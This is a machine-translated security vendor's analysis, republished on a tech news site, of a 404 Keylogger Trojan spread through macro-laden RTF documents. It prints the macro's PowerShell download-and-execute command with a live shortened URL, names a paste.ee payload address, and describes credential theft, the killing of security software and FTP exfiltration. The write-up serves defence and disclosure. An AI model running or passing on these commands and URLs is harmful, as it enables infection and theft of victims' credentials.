Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

How does the latest Keylogger Trojan steal the account and password of the victim's browser?

2025-01-26 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Development >

Share

Shulou(Shulou.com)06/02 Report--

This article will explain in detail how the latest Trojan horse stole the account and password of the victim's browser. The content of the article is of high quality, so the editor will share it for you as a reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

Convinced that the security team captured a new 404 Keylogger Trojan variant, embedded malicious macro code through OFFICE documents to spread, stole the victim's browser website account and password, convinced the security team to conduct a detailed analysis of this sample, and obtained the hacker FTP server account and password, please improve your security awareness, do not easily open unknown email attachments and documents, etc.

The sample is an RTF document with nested OLE objects and malicious macro code, as shown below:

Malicious macro code starts the PowerShell process, downloads the malicious program from the remote server, and then executes the relevant parameters, as follows:

Powershell (NEw-objEct system.net.wEBclIenT) .DownLoAdfIlE ("http://bit.ly/2P7EoT7", "$ENv:teMp\ 4235.exe"); stARt "$ENv:tEMP\ 4235.exe"

If you analyze the downloaded malicious program and develop it using the .NET language, you will first obtain the remote server address: hxxps://paste.ee/r/RrkBF, as shown below:

Read the contents on the remote server, as follows:

Load and execute the script on the remote server directly, as follows:

After decrypting and obfuscating the script on the remote server, it is also a program written by NET, as follows:

The main function of this program is keylogging. stealing the account and password on the victim's browser website will end the browser-related process on the victim's host, as follows:

Against killing software and ending related security software processes, there are more than 100 related security software processes, as shown below:

Record the website on the browser, as well as the relevant account number and password, and then send it to the hacker's remote FTPd server, as follows:

The malicious program also has screenshots and other operations. When analyzing the malicious program, we found the hacker's FTP server address, account number and password. Log in, and found that it has stolen the host information of some victims, as shown below:

Solution virus detection and killing

1. Convinced that security products such as EDR products, next-generation firewalls and security awareness platforms all have virus detection capabilities, users who deploy related products can perform virus detection, as shown in the figure:

2. Convinced to provide free inspection and killing tools for the majority of users, you can download the following tools for testing and killing.

64-bit system download link:

Http://edr.sangfor.com.cn/tool/SfabAntiBot_X64.7z

32-bit system download link:

Http://edr.sangfor.com.cn/tool/SfabAntiBot_X86.7z

Virus defense

1. Patch the computer in time, upgrade the application program in time, and fix the loophole.

2. Do not click on email attachments from unknown sources or download software from unknown websites.

3. Convinced firewall customers, it is recommended to upgrade to AF805 version and enable artificial intelligence engine Save to achieve the best defense effect.

About 404 Keylogger latest Trojan horse is how to steal the victim browser website account and password to share here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 257

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Development

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report